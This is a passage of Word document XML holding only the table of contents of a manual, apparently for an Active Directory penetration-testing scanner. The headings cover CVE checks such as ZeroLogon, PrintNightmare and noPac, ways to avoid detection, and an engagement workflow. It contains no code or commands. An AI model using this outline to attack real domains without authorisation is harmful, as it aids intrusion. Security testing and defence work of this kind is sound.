              <w:fldChar w:fldCharType="separate"/>
              <w:t>10</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B2BE90B" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561308" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.  CVE Detection Modules  (--cves)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561308 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>11</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E981B2A" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561309" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1  noPac — CVE-2021-42278 / CVE-2021-42287</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561309 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>11</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C572819" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561310" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2  AD CS Misconfigurations — ESC1 through ESC8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561310 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>11</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26AA1B14" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561311" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3  ZeroLogon — CVE-2020-1472  [Aggressive]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561311 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>12</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66DD997E" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561312" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4  PrintNightmare — CVE-2021-1675 / CVE-2021-34527  [Aggressive]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561312 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>12</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E565EB3" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561313" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5  PetitPotam — CVE-2021-36942  [Aggressive]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561313 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>13</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="327BD065" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561314" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.6  MS14-068 — CVE-2014-6324  [PAC Forgery]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561314 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>13</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1000001F" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>5.7  GPP Passwords — MS14-025</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="10000020" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>5.8  Bronze Bit — CVE-2020-17049</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="10000021" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>5.9  Certifried — CVE-2022-26923</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="10000022" w14:textId="77777777" w:rsidR="00707BE4" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>5.10  LDAP Signing Not Required</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="52F68496" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561315" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.  Scoring &amp; Priority Engine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561315 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>14</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56495CC9" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561316" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1  How Findings Are Ranked</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561316 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>14</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5779733E" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561317" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2  Next Step Generation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561317 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>14</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="694704C3" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561318" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.  Output &amp; Export</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561318 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>15</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="648E949D" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561319" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1  Terminal Output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561319 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>15</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CE83AD4" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561320" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2  JSON Export (-o json)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561320 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>15</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0425B129" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561321" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3  BloodHound Export (-o bloodhound)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561321 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>15</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="350A12B7" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561322" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4  Scan History Database</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561322 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>15</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E7CBF62" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561323" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.  Complete Flag Reference</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561323 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>17</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72C708B0" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561324" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1  Target &amp; Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561324 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>17</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58A52BF7" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561325" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2  Module Selection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561325 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>17</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53948F73" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561326" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3  Output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561326 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>17</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05501E20" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561327" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4  Tuning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561327 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>18</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DA061F4" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561328" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5  Scan History</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561328 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>18</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CDAAD8D" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561329" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.  Detection Profile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561329 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C40C0E2" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561330" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.1  Noise Level by Module</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561330 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B345C97" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561331" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.2  Staying Quiet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561331 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32D0F96D" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561332" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.3  The RC4 Problem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561332 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15FDAC02" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561333" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.  Typical Engagement Workflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561333 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>21</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FBC814C" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561334" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 1 — Initial Foothold</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561334 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>21</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DB91FC5" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561335" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 2 — Review the Priority Table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561335 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>21</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02049645" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc224561336" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 3 — Execute Against Top Targets</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224561336 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t>21</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05059668" w14:textId="77777777" w:rsidR="00E11042" w:rsidRDefault="00E11042">
          <w:pPr>
